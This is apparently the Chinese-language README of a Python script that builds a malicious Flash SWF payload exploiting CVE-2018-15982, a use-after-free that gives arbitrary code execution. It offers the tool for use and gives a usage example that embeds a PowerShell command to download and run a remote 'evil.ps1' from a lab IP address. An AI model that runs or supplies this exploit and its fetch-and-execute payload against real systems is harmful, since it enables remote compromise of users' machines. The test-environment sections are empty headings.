此脚本为 CVE-2018-15982 创建 swf 载荷,其基于 https://github.com/smgorelik/Windows-RCE-exploits 中的 PoC。该漏洞由 Gigamon ATR 的 Chenming Xu 和 Ed Miles 发现。
该漏洞是一个释放后重用缺陷,可在 Flash 中实现任意代码执行。更多信息见以下链接。
注意:目前仅喷射一个内存块,我是在创建脚本后注意到这一点的。
用法:
python create_swf.py <command> <output file name>
使用示例:
python create_swf.py "powershell.exe IEX (iwr 'http://192.168.56.101/evil.ps1')" downloadtest.swf
测试环境:
创建载荷:

执行载荷:

确认执行:

